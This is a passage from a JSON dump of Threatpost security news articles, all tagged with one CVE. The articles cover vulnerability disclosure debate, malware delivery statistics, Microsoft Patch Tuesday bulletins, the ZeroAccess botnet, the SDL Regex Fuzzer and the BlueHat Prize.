That\u2019s essentially what you\u2019re doing when you say \u201cyou should be able to fix it and fix it now, and if you don\u2019t do it on my timeline, then you obviously need to be made an example of so I\u2019m going to release an exploit for it into the wild.\u201d\n\nThey don\u2019t swim in your security research toilet :-), so why must you pee in their development or infrastructure pool?\n\nOkay, I couldn\u2019t resist making the joke \u2013 and no, I don\u2019t think [security research is a cesspool](<http://spiresecurity.typepad.com/spire_security_viewpoint/2005/03/not_again.html>), or I wouldn\u2019t have [founded two vulnerability research programs](<http://blogs.msdn.com/sdl/pages/about-us.aspx#k8e>) in my career. What I am saying is that all of us should be striving for the delicious harmony of combining your chocolate with my peanut butter, your gin and my tonic, your milk and my shake, in order to make the whole greater than the sum of its parts. As a researcher, one can choose to be the sabot and grind gears to a halt to prove a point, or one can be the grease that moves things along with less friction, earning the trust that will allow each subsequent notification pill to be swallowed more easily. As a developer or deployer, one can choose to stuff up one\u2019s ears until someone firmly inserts an icepick, or one can strive to fix things as quickly and safely as possible and learn from the experience to continually improve and speed up that process over time.\n\nWe need a better way to reach our common ground of protecting the computing environment on which we all rely. Researchers need a means by which to communicate urgency that avoids descriptive hyperbole or causes damage, which erodes trust. Developers and deployers need a better way to service existing code and infrastructure reliably, safely, and rapidly if necessary, to build trust among the researcher and customer communities that they are doing the best they can at any given time. 
Around here, we\u2019ve done serious work on making this a reality on the development front, with the dual-ninjas of SDL (proactive) and MSRC (reactive). I\u2019d like to see SDL someday brought up to a full double-D in the form of a Secure Development and Deployment Lifecycle, to build infrastructure design and servicing models that are resilient in the face of threats to deployments as well as software. Perhaps I can begin to work on this here at Microsoft, if I can get some of my [other work done first](<http://blogs.msdn.com/sdl/archive/2008/09/11/new-addition-to-the-starting-line-up.aspx>). \ud83d\ude42\n\nAfter we had each said our piece on what our security utopia looked like, that\u2019s where we left things. No agreement could be reached in the two hours or so we were on the stage, which is no surprise. If the tape ran out before the end, then you won\u2019t get to see us literally \u201chug it out\u201d after all was said and done, disagreements notwithstanding. I continue to have tremendous respect and share camaraderie with my fellow panelists and with researchers around the world. It is my hope that the determination and vision of those on any side of the equation who can see across the role boundaries of researcher, vendor, and deployer will usher us into a new age.\n\nPeople often ask what more is there to say about disclosure that hasn\u2019t already all been said. I think the real conversation on how to get the results we all desire \u2013 to get things fixed *in spite of* our disagreement \u2013 has yet to truly begin.\n\nI\u2019m listening, as well as talking. Are you?\n\n_* [Katie Moussouris](<http://blogs.msdn.com/katie_moussouris>) is a senior security program manager in Microsoft\u2019s Secure Development Lifecycle (SDL) team._\n\n_Photo credit: Microsoft._\n", "cvss3": {}, "published": "2009-03-23T20:02:26", "type": "threatpost", "title": "Partial disclosure: Was it a cat I saw?", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-05-03T17:57:44", "id": "THREATPOST:27F8092D2D7E88CBD23EAF8A7A016E24", "href": "https://threatpost.com/partial-disclosure-was-it-cat-i-saw-032309/72387/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-08-03T08:20:30", "description": "Attacks using malicious Microsoft macros, always a popular method for compromising target machines, are more virulent than ever, accounting for 45 percent of all delivery mechanisms analyzed in August.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2018/09/13142638/Cofense-loaders.png>)\n\nTop Malware Delivery Mechanisms in August\n\nJust behind this tried-and-true method lies the Microsoft Office Memory Corruption Vulnerability ([CVE-2017-11882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882>)), a bug that allows the attacker to perform arbitrary code execution. In a [report](<https://cofense.com/microsoft-office-macros-still-leader-malware-delivery>) released Thursday from Cofense Intelligence, it was shown to be responsible for 37 percent of malware delivery last month, despite having been patched since last November.\n\nThe remaining 18 percent of delivery mechanisms spotted in August is mainly made up of batch scripts, PowerShell scripts and downloaders for Microsoft Windows scripting component ([WSC](<http://filext.com/file-extension/WSC>)) files (often seen in games). 
These all trail far, far behind the two leading vectors, with less than 6 percent of attacks each.\n\n**Macros a Major Problem**\n\nThe report shows that weaponized Microsoft Office documents delivered via email maintain their strong hold as the \u201cdelivery mechanism du jour\u201d \u2013 and notably, not just for the low-hanging fruit types of campaigns that make use of spray-and-pray mass spam efforts.\n\nMacros, of course, make a lot of sense for delivering a malicious payload to the endpoint because they can be allowed with a simple, single mouse-click on the part of the user when prompted. And, although Microsoft disables them in Microsoft Office by default, some enterprises have turned them on, so a user may have no other indication that anything is amiss.\n\n\u201cThis makes it almost trivial to launch the first stage of an infection chain,\u201d said Cofense researcher Aaron Riley. \u201cMacros, used as such, are embedded Visual Basic scripts typically used to facilitate either the download or direct execution of further payloads.\u201d\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2018/09/13143100/cofense-payloads.png>)\n\nTop Macro-Delivered Payloads\n\nCofense found that while the macro approach is easy to execute and has an extremely low barrier-to-entry, the malware being delivered includes the most malignant out there, including [Geodo](<https://threatpost.com/cridex-variant-geodo-part-trojan-part-email-worm/106943/>) (accounting for the majority of the observed macro-delivered payloads), [Chanitor/Hancitor](<https://threatpost.com/spammers-revive-hancitor-downloader-campaigns/123011/>) (the second-most delivered payload), [AZORult](<https://threatpost.com/updated-azorult-spyware-comes-with-sophisticated-new-techniques/134555/>) and [GandCrab](<https://threatpost.com/gandcrabs-rotten-eggs-hatch-ransomware-in-south-korea/136689/>) \u2013 along with more commodity fare like 
[TrickBot](<https://threatpost.com/new-trickbot-variant-touts-stealthy-code-injection-trick/136606/>).\n\n\u201cThe range of different types of malware, from simple bots to ransomware, shows that mature and amateur operators alike are using this vehicle to get the payload to the endpoint,\u201d Riley noted.\n\n**A Known Vulnerability**\n\nThe analysis also uncovered that, almost as prevalent as macros, the CVE-2017-11882 vulnerability found in the Microsoft Office Equation Editor Component is the second-most used attack vector for delivering malware.\n\n\u201cThe vulnerability resides in the Equation Editor Component which, when used, runs as its own process (eqnedt32.exe),\u201d Oleg Kolesnikov, researcher at Securonix, explained to us recently. \u201cBecause of the way it was implemented, it doesn\u2019t support Data Execution Prevention (DEP) and Address Space Layout Randomization (ASLR). A malicious document exploits the vulnerability to execute a command.\u201d\n\nThe Microsoft Office Memory Corruption Vulnerability (CVE-2017-11882) is being used in the wild by the [Osiris banking trojan](<https://threatpost.com/osiris-banking-trojan-displays-modern-malware-innovation/137393/>), the [FELIXROOT](<https://threatpost.com/felixroot-backdoor-resurfaces-in-environmental-spam-campaign/134515/>) backdoor malware, and a legitimate tool that\u2019s being abused as spyware called [Imminent Monitor](<https://threatpost.com/targeted-spy-campaign-hits-russian-service-centers/132639/>) \u2013 among many others.\n\nThe takeaway? 
Though [new types of document attacks](<https://threatpost.com/word-attachment-delivers-formbook-malware-no-macros-required/131075/>) are emerging that target inboxes and do not require macros to trigger an infection chain \u2013 and even though stealthy approaches using [lightweight scripts](<https://threatpost.com/bad-actors-sizing-up-systems-via-lightweight-recon-malware/137364/>) are on the rise, for now, macros are still tops in cybercriminals\u2019 playbooks, along with betting on unpatched machines. So basic security hygiene remains the best first defense for users.\n", "cvss3": {}, "published": "2018-09-13T19:26:42", "type": "threatpost", "title": "ThreatList: Microsoft Macros Remain Top Vector for Malware Delivery", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-09-13T19:26:42", "id": "THREATPOST:483C67752109A3C6AF1920AEA0F63B4C", "href": "https://threatpost.com/threatlist-microsoft-macros-remain-top-vector-for-malware-delivery/137428/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-10-06T22:59:23", "description": "The expected continued respite from deploying Internet Explorer patches was apparently a mirage as Microsoft changed course from last Thursday\u2019s advance notification and added two more bulletins to the [February 2014 Patch Tuesday security updates](<http://technet.microsoft.com/en-us/security/bulletin/ms14-feb>), including the first IE rollup of 2014.\n\nIE had been patched monthly for close to a year until the January security bulletins were released, and eyebrows were raised again last Thursday when there was no mention of an IE update.\n\nToday, however, Microsoft reversed course with [MS14-010](<https://technet.microsoft.com/en-us/security/bulletin/ms14-010>), which patches 24 vulnerabilities in the browser, including one that has been publicly disclosed. 
No active exploits have been reported, Microsoft said.\n\nAll of the vulnerabilities enable remote code execution, and affect versions of IE going back to IE 6 on Windows XP up to IE 11 on Windows 8.1. More than 20 CVEs involving memory corruption vulnerabilities in IE were addressed along with a cross-domain information disclosure vulnerability, an elevation of privilege vulnerability and a memory corruption issue related to VBScript that is addressed in [MS14-011](<https://technet.microsoft.com/en-us/security/bulletin/ms14-011>).\n\nAn IE user would have to be lured to a website hosting an exploit for the vulnerability in the VBScript scripting engine in Windows. The engine improperly handles objects in memory, Microsoft said, and an exploit could corrupt memory and allow an attacker to run code on a compromised machine.\n\n\u201cTo go from five to seven bulletins says to me that initial testing was completed last minute so they decided to slip the patch in or testing found an issue and engineer shipped a fix last minute,\u201d said Tyler Reguly, manager of security research at Tripwire. \u201cEither way, pay extra attention to MS14-010 and MS14-011 in your test environments this month before you push them out enterprise wide.\u201d\n\nColleague Craig Young cautions that a number of the IE vulnerabilities can be combined to gain admin access on compromised machines.\n\n\u201cWithout any doubt, attacks in the wild will continue and expand to the other vulnerabilities being fixed today,\u201d Young said.\n\nAs promised, Microsoft did patch a remote code execution vulnerability, [MS14-008](<https://technet.microsoft.com/en-us/security/bulletin/ms14-008>), in its Forefront Protection for Exchange 2010 security product. Microsoft said it removed the offending code from the software.\n\n\u201cI\u2019m sure a lot of people will call attention to the Forefront Protection for Exchange patch this month. 
However, when Microsoft, the people with the source code, tells us they can\u2019t trigger the vulnerability in a meaningful way, I intend to believe them,\u201d said Tripwire\u2019s Reguly. \u201cI suspect we\u2019ll wake up tomorrow and beyond pressing apply, we\u2019ll forget this was even released.\u201d\n\nMicrosoft stopped updating Forefront for Exchange as of September 2012, but will support it with security updates for another 22 months.\n\n\u201cThis should make administrators think about upgrading their Exchange servers to the latest version (which includes basic anti-malware protection by default) or consider a third party email security application,\u201d said Russ Ernst of Lumension. \u201cAdministrators that currently use Forefront Protection for Exchange have until December 2015 to get this done.\u201d\n\nThe final critical bulletin, [MS14-007](<https://technet.microsoft.com/en-us/security/bulletin/ms14-007>), is another remote code execution bug in Direct2D, which can only be triggered by viewing malicious content in IE. Direct2D is a graphics API used for rendering 2-D geometry, bitmaps and text, Microsoft said. This vulnerability affects Windows 7 through Windows 8.1.\n\nMicrosoft also released three bulletins rated important that patch privilege elevation, information disclosure and denial of service vulnerabilities.\n\n * [MS14-009](<https://technet.microsoft.com/en-us/security/bulletin/ms14-009>) patches two publicly disclosed bugs in the .NET framework that could allow an attacker to elevate their privileges on a compromised machine.\n * [MS14-005](<https://technet.microsoft.com/en-us/security/bulletin/ms14-005>) handles a vulnerability in Microsoft XML Core Services that could lead to information disclosure if the victim visits a malicious site with IE.\n * [MS14-006](<https://technet.microsoft.com/en-us/security/bulletin/ms14-006>) addresses a denial-of-service vulnerability in Windows 8, RT, and Server 2012, that has been publicly disclosed. 
An attacker would have to send a large number of malicious IPv6 packets to a vulnerable system to exploit the bug, and the attacker must be on the same subnet as the victim.\n\nMicrosoft also sent out an update that officially [deprecates the use of the MD5 hash algorithm](<http://threatpost.com/light-microsoft-patch-load-precedes-md5-deprecation/104104>). Digital certificates with MD5 hashes issued under roots in the Microsoft root certificate program are from now on restricted.\n\n\u201cCertificates with MD5 hashes should no longer be considered safe,\u201d said Dustin Childs, group manager, Microsoft Trustworthy Computing. \u201cWe\u2019ve given our customers six months to prepare their environments, and now this update is available through automatic updates.\u201d\n", "cvss3": {}, "published": "2014-02-11T14:19:34", "type": "threatpost", "title": "February 2014 Microsoft Patch Tuesday Security Bulletins", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-02-11T19:19:34", "id": "THREATPOST:5E4874778A3B5A26CF2755C59BA3A7A8", "href": "https://threatpost.com/microsoft-adds-critical-ie-patches-under-the-wire/104214/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:57:28", "description": "Long thought dead, the peer-to-peer (P2P) ZeroAccess botnet has resurfaced, and as of just a few weeks ago, has returned to propagating click-fraud scams.\n\nResearchers with Dell\u2019s SecureWorks [revealed Wednesday](<http://www.secureworks.com/resources/blog/zeroaccess-botnet-resumes-click-fraud-activity-after-six-month-break/>) that they witnessed the botnet restart itself from March 21 to July 2, 2014 and that halfway through this month \u2013 six months after it was last seen \u2013 the botnet has apparently gone back to its old ways and is again doling out click-fraud templates.\n\nClick-fraud, one of the easier techniques cybercriminals use to monetize 
malware, is essentially the embezzling of ad revenue from clicks that don\u2019t come from legitimate customers.\n\nDespite the botnet\u2019s resurfacing, researchers insist it hasn\u2019t grown or even tried to incorporate new compromises. Instead the botnet, which has split into two smaller botnets that use different UDP ports, is built around hosts from past infections.\n\nAs seen below, researchers found ZeroAccess in two smaller botnets in both 32-bit (blue) and 64-bit (gray) compromised Windows systems.\n\n\n\n\u201cCompromised systems act as nodes in the P2P network, and they periodically receive new templates that include URLs for attack-controlled template servers,\u201d the firm\u2019s Counter Threat Unit (CTU) wrote.\n\nOnce the URLs are visited, like a chain reaction, the bots are redirected to their final destination.\n\nThe unit claims it counted 55,000-plus different IP addresses \u2013 mostly in Japan, India and Russia \u2013 engaging with the botnet from Jan. 17 to Jan. 25. Some may consider 55K small potatoes compared to the botnet\u2019s heyday, when Microsoft cleaned half a million machines of the virus from Feb. to March 2013, but Dell is stressing that for all intents and purposes ZeroAccess should still be considered substantial.\n\nAdding that it may not be able to do what other flashy botnets can, like carry out banking fraud or hold users\u2019 files ransom, ZeroAccess can still wreak havoc on advertisers and machines it infects alike.\n\nIt was thought the [botnet was dead](<http://threatpost.com/microsoft-zeroaccess-botnet-has-been-abandoned/103273>) in December 2013 after Microsoft, along with Europol\u2019s European Cybercrime Centre (EC3), the F.B.I., and the firm A10 [disrupted ZeroAccess\u2019s](<http://threatpost.com/microsoft-and-friends-take-down-zeroaccess-botnet/103122>) two million odd machines. Click-fraud is just one of the botnet\u2019s favorite pastimes. 
ZeroAccess, a/k/a Sirefef, has also been seen hijacking search results and redirecting victims to malicious, information stealing websites and for a short stint the platform was even spotted [facilitating Bitcoin mining](<http://threatpost.com/zeroaccess-botnet-cashing-click-fraud-and-bitcoin-mining-103012/77168>).\n\n[Microsoft greatly curbed](<http://threatpost.com/microsofts-curbs-click-fraud-in-zeroaccess-fight/100717>) the botnet\u2019s click-fraud tendencies in May 2013 after it added its signature to its Malicious Software Removal Tool (MSRT) and cleaned all the infected machines it could find of ZeroAccess.\n", "cvss3": {}, "published": "2015-01-29T14:25:48", "type": "threatpost", "title": "ZeroAccess Returns, Resumes Click-Fraud Activity", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-02-03T14:05:27", "id": "THREATPOST:ABA04F8289071D7B10CAE4202D0EB18E", "href": "https://threatpost.com/zeroaccess-botnet-returns-resumes-click-fraud-activity/110736/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:00:03", "description": "[](<https://media.threatpost.com/wp-content/uploads/sites/103/2013/10/07040458/andrew_storms.jpg>)On Oct. 9, 2003, Microsoft announced its new security patching process that would end up being a catalyst for significant change in the information security community. 
Ten years ago, the program was announced with a press release that promised:\n\n * \u201cImproved patch management processes, policies and technologies to help customers stay up to date and secure.\u201d\n * \u201cGlobal education programs to provide better guidance and tools for securing systems.\u201d\n\nWithin the [press release](<http://www.prnewswire.com/news-releases/microsoft-outlines-new-initiatives-in-ongoing-security-efforts-to-help-customers-72447792.html>), chief executive officer Steve Ballmer said: \u201cOur goal is simple: Get our customers secure and keep them secure. Our commitment is to protect our customers from the growing wave of criminal attacks.\u201d\n\nThose of us working in the security industry or with corporate information security responsibility saw this as a direct response to the famous [Trustworthy Computing memo](<http://www.microsoft.com/en-us/news/features/2012/jan12/gatesmemo.aspx>) penned by Bill Gates in January 2002. The signs were clear. Microsoft was faced with a serious dilemma. Its software was riddled with security holes that were having a direct negative effect on its customers\u2019 security, availability and privacy. In corporate IT, Microsoft had quickly gotten its own nickname of \u201cnecessary evil.\u201d IT managers were forced to use Microsoft software for its business features, but it came at the cost of serious security risks.\n\nWhether you like or disdain Microsoft, the new security initiatives started 10 years ago created a great wave of change in our information security industry.\n\nFor starters, Microsoft proved to the security community that communication is a key cornerstone to vendor relationships. No one likes to admit they have security problems. Microsoft took the leap of not only admitting it had a problem, but also committed to delivering ongoing communications to its customers and to all computing users. 
Microsoft started blogging about security issues and also embarked on serious outbound communication campaigns to educate users.\n\nMicrosoft showed that communication and relationships are a two-way street. The powerhouse eventually grew to an age where it embraced the same community of people who were responsible for finding and publicly releasing security holes in its software. Today, public disclosure of serious Microsoft security holes is the exception.\n\nAlso, resource planning is table stakes in the enterprise IT world. Being a cost center doesn\u2019t help much, but IT has traditionally been underfunded and underappreciated. What is an enterprise IT or security manager supposed to do when their primary software vendor springs on them a critical security patch with do-or-die consequences? Historically, and still the case today, a lot of ongoing projects get dropped to quickly reallocate resources to the moment\u2019s critical security patch. Living in a world of constant interruption is detrimental to morale and to the completion of any planned projects.\n\nWith Microsoft\u2019s new consistent patch release timing, enterprise IT could depend on a schedule and allocate resources accordingly. The monthly patching cycle soon became better known as Patch Tuesday. Later in Microsoft\u2019s maturity model, it would introduce the advanced notification service. We know this today as the Thursday before Patch Tuesday, when we receive a high level snippet of what to expect the following week.\n\nMicrosoft also proved value with consistency in other ways. For example, Microsoft took the early bold step of defining its security criticality ratings and made the definitions public. Even Microsoft\u2019s security bulletin text format and sections were delivered in a consistent format that security professionals have come to rely upon. Security people like repeatable and dependable systems. Microsoft delivered just that.\n\nThree cheers to Patch Tuesday. 
It\u2019s the second Tuesday of each month that we both love and hate. Ten years ago, the Patch Tuesday initiatives created profound benefits to all Microsoft consumers by making it easier to keep systems patched and more secure. At the time, the idea seemed so foreign, but has since gained so much following that other vendors such as Cisco, Adobe and Oracle have followed suit. Spend just five minutes today and consider where you\u2019d be today without Microsoft taking the leap 10 years ago.\n\n_Andrew Storms is the Director of DevOps for CloudPassage._\n", "cvss3": {}, "published": "2013-10-02T09:40:46", "type": "threatpost", "title": "A Decade of Microsoft Patch Tuesday Security Updates", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-10-07T15:44:02", "id": "THREATPOST:1327F2449E675DB6F1F90EDB766B1DC8", "href": "https://threatpost.com/take-time-to-reflect-as-microsoft-patch-tuesday-turns-10/102488/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:07", "description": "Scott Charney, the head of Microsoft\u2019s Trustworthy Computing efforts, said that he was the one who decided it was time to [move the TwC group in a new direction](<https://threatpost.com/era-ends-with-break-up-of-trustworthy-computing-group-at-microsoft/108404>) and integrate the security functions more deeply into the company as a whole.\n\n\u201cI was the architect of these changes. This is not about the company\u2019s loss of focus or diminution of commitment. Rather, in my view, these changes are necessary if we are to advance the state of trust in computing,\u201d Charney, the corporate vice president of Trustworthy Computing at Microsoft, wrote in a blog post.\n\nThe Trustworthy Computing team was an outgrowth of the effort that Microsoft started in 2002 to build more secure software. 
Modest at first, the TwC group eventually grew into a large team of engineers, developers and executives and became one of the more influential groups in the company. Charney, a former Department of Justice lawyer who joined Microsoft just as the security push was getting off the ground in 2002, said that the move to disperse the TwC team into different groups and change the reporting structure would help the company react more quickly and be more efficient with security related decisions.\n\n\u201cBy consolidating work within the company, as well as altering some reporting structures, Microsoft will be able to make a number of trust-related decisions more quickly and execute plans with greater speed, whether the objective is to get innovations into the hands of our customers, improve our engineering systems, ensure compliance with legal or corporate policies, or engage with regulators around the world,\u201d Charney wrote in the [post](<http://blogs.microsoft.com/cybertrust/2014/09/22/looking-forward-trustworthy-computing/>).\n\nOne of the key functions of the TwC team over the years has been the development and implementation of the Security Development Lifecycle, the comprehensive development, engineering and deployment program that\u2019s meant to build security into the company\u2019s products from the beginning. Charney said that the SDL will remain the responsibility of the part of the TwC group that\u2019s moving to the Cloud and Enterprise Division.\n\n\u201cI will continue to lead the Trustworthy Computing team in our new home as part of the Cloud and Enterprise Division. Significantly, Trustworthy Computing will maintain our company-wide responsibility for centrally driven programs such as the Security Development Lifecycle (SDL) and Online Security Assurance (OSA). 
But this change will also allow us to embed ourselves more fully in the engineering division most responsible for the future of cloud and security, while increasing the impact of our critical work on privacy issues by integrating those functions directly into the appropriate engineering and legal policy organizations,\u201d Charney said.\n\nThe change to the TwC group became public last week as the company was in the process of laying off 2,100 employees as part of a series of internal changes.\n", "cvss3": {}, "published": "2014-09-23T08:53:50", "type": "threatpost", "title": "Charney on Trustworthy Computing: 'I Was the Architect of These Changes'", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-09-25T18:08:18", "id": "THREATPOST:04738138B50414CEACDB62EFA6D61789", "href": "https://threatpost.com/charney-on-trustworthy-computing-i-was-the-architect-of-these-changes/108455/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:06:49", "description": "[](<https://threatpost.com/microsoft-releases-new-regex-fuzzer-101310/>)Microsoft has released a new fuzzing tool designed specifically to find mistakes in regular expressions in application code that could be vulnerable to attack. The [SDL Regex Fuzzer](<https://www.microsoft.com/downloads/en/details.aspx?FamilyID=8737519c-52d3-4291-9034-caa71855451f>) identifies problematic lines that might cause an application to be susceptible to attacks that consume huge amounts of resources and cause denial-of-service conditions.\n\nThe new fuzzer is meant to be used specifically to find vulnerable regular expressions in application code that could lead to a special kind of attack known as a ReDoS. 
Microsoft officials say that as more and more applications are moved to cloud providers, attackers will begin to focus their attention on those applications in new and profitable ways.\n\n\u201cI\u2019ve [predicted](<http://msdn.microsoft.com/en-us/magazine/ff646973.aspx>) before that as cloud computing gains wider adoption, we\u2019ll start to see a significant increase in denial of service (DoS) attacks against those services. When you\u2019re paying for the processor time, bandwidth and storage that your applications use, attacks that explicitly target and consume those resources can get very expensive very quickly, not to mention the costs of downtime for legitimate users. Attackers will shift from pursuing elusive privilege elevation vulnerabilities to simply blackmailing SaaS providers: pay me $10,000 or I\u2019ll make your app consume $20,000 worth of server resources,\u201d Microsoft\u2019s Bryan Sullivan wrote in a blog post explaining the SDL Regex Fuzzer.\n\nAs Sullivan explains in an [article](<http://msdn.microsoft.com/en-us/magazine/ff646973.aspx>) on the problem from earlier this year, a small change to an input string can cause major problems for a regular expression engine.\n\n\u201cHere is where things get \u2018interesting\u2019 (as in horribly dangerous). \nInstead of just checking that the next character after 5 is not the end \nof the string, the engine treats the next character, 6, as a new capture \ngroup and starts rechecking from there. Once that route fails, it backs \nup to 1234 and then tries 56 as a separate capture group, then 5 and 6 \neach as separate capture groups. The end result is that the engine \nactually ends up evaluating 32 different paths,\u201d he wrote. \n\n\u201cIf we now add just \none more numeric character to the evaluation string, the engine will \nhave to evaluate 64 paths\u2014twice as many\u2014to determine that it\u2019s not a \nmatch. 
This is an exponential increase in the amount of work being \nperformed by the regex engine. An attacker could provide a relatively \nshort input string\u201430 characters or so\u2014and force the engine to process \nhundreds of millions of paths, tying it up for hours or days.\u201d\n\nThe new fuzzer is free to download.\n", "cvss3": {}, "published": "2010-10-13T18:08:57", "type": "threatpost", "title": "Microsoft Releases New Regex Fuzzer", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T10:20:31", "id": "THREATPOST:EF898143DB86CE46FFBDC81DCD8E79AA", "href": "https://threatpost.com/microsoft-releases-new-regex-fuzzer-101310/74571/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:03:26", "description": "Microsoft is looking into a potential security issue affecting its Xbox 360 video game console this week after a group of college students claimed they were able to extract the credit card information of a console\u2019s previous owner from the machine.\n\nAshley Podhradsky, Rob D\u2019Ovidio, and Cindy Casey of Drexel University and Pat Engebretson of Dakota State University reportedly bought a refurbished Xbox from a Microsoft-authorized reseller in 2011 and were able to access old files containing the credit card information of the device\u2019s first owner. 
Despite having its hard drive wiped and its factory settings previously reset, the console was cracked after the students installed a software \u201cmodding\u201d tool that allows Xbox owners to install applications that aren\u2019t sanctioned by Microsoft.\n\n\n\nMicrosoft called the hack unlikely in a [statement obtained by ZDNet](<http://www.zdnet.com/blog/security/microsoft-investigating-used-xbox-360-credit-card-hack/11260?tag=content;siu-container>) on Monday.\n\nJim Alkove, General Manager, Security of Microsoft\u2019s Interactive Entertainment Business division, claimed the company launched an investigation into the hack. Alkove asserted that Xbox 360 consoles are not designed to store credit card data, adding that it was unlikely any information was recovered in the fashion the hackers described.\n\n\u201cWhen Microsoft refurbishes used consoles we have processes in place to wipe the local hard drives of any other user data,\u201d Alkove said, \u201cwe can assure Xbox owners we take the privacy and security of their personal data very seriously.\u201d\n\nGawker\u2019s video game blog [Kotaku](<http://kotaku.com/5897461/hackers-can-steal-credit-card-information-from-your-old-xbox-experts-tell-us>) interviewed Podhradsky about the device\u2019s security late last week.\n\n\u201cMicrosoft does a great job of protecting their proprietary information,\u201d she told the site, \u201cbut they don\u2019t do a great job of protecting the user\u2019s data.\u201d\n\nWhile the security of Microsoft\u2019s gaming console ([Xbox Live phishing attempts](<https://threatpost.com/xbox-security-chief-says-account-hacks-linked-phishing-resale-schemes-102011/>), etc.) 
has been called into question before, this is one of the first reports that claim the console\u2019s physical hard drive may be at risk.\n\nNASA, whose hard drives arguably carry more sensitive information than an Xbox, [caught similar heat in 2010](<https://threatpost.com/audit-nasa-fails-properly-wipe-data-discarded-drives-120810/>) after it was found not adequately wiping, sanitizing and destroying its own hard drives.\n", "cvss3": {}, "published": "2012-04-03T21:13:12", "type": "threatpost", "title": "Microsoft to Investigate Alleged Xbox Credit Card Hack", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:32:31", "id": "THREATPOST:BDA1752A66AD0D3CF8AB59CFB7A8F472", "href": "https://threatpost.com/microsoft-investigate-alleged-xbox-credit-card-hack-040312/76392/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:02:33", "description": "[](<https://threatpost.com/vasillis-pappas-wins-200000-microsoft-blue-hat-prize-072712/>)LAS VEGAS\u2013Microsoft on Thursday handed out three rather large checks to a trio of security researchers, the largest one\u2013$200,000\u2013going to Vasillis Pappas who won the company\u2019s first [Blue Hat Prize](<https://threatpost.com/three-nations-and-three-different-perspectives-blue-hat-finalists-focus-defense-072612/>) competition for defensive technologies. Pappas\u2019s kBouncer ROP mitigation technology edged out ROP-related submissions from the two other finalists, and will be integrated by Microsoft in the near future.\n\nThe company announced Pappas as the winner of the contest at its annual party at the end of the Black Hat conference here with a splashy American Idol-style reveal, complete with blaring music and a massive confetti shower. Pappas, a PhD candidate at Columbia University, has been focused on the research for his submission for more than a year. 
His kBouncer technology uses the kernel to enforce restrictions about what processes can do, and prevents anything that looks like return-oriented programming from running.\n\nIn addition to the $200,000 that Pappas won, Ivan Fratric was awarded $50,000 for his ROPGuard technology and Jared DeMott won $10,000 and an MSDN subscription for his /ROP submission. Microsoft officials said they were quite happy with the quality of the submissions for the contest and accomplished their stated goal of identifying innovative defensive technologies.\n\n\u201cRunning the BlueHat Prize contest allowed us insight into a greater number of people who are doing some deep thinking in the areas of security mitigation technology. This not only helps Microsoft find and work with talented people, but the spotlight that we can help shine on all of these contestants will hopefully help them market their ideas and talent so that the entire security industry can benefit and improve,\u201d [Katie Moussouris of Microsoft](<https://blogs.technet.com/b/ecostrat/archive/2012/07/26/the-bluehat-prize-v1-0-and-the-winners-are.aspx?Redirected=true>) said in a blog post on the contest.\n\nMicrosoft officials have said repeatedly in the last few years that the company does not plan to offer bug bounties to security researchers who discover vulnerabilities in Microsoft products. Google, Mozilla and several other companies have such programs, and the Blue Hat prize was Microsoft\u2019s way of responding and attempting to focus the energy of researchers on defensive technologies instead of finding bugs.\n\n\u201cOne thing is certain \u2013 we will continue to invest in security defense at Microsoft, and we will continue to offer cash incentives to the security community for helping Microsoft, and the rest of the industry, to help improve the state of security for the entire ecosystem. In sports, as in life, a great team understands both offense and defense. 
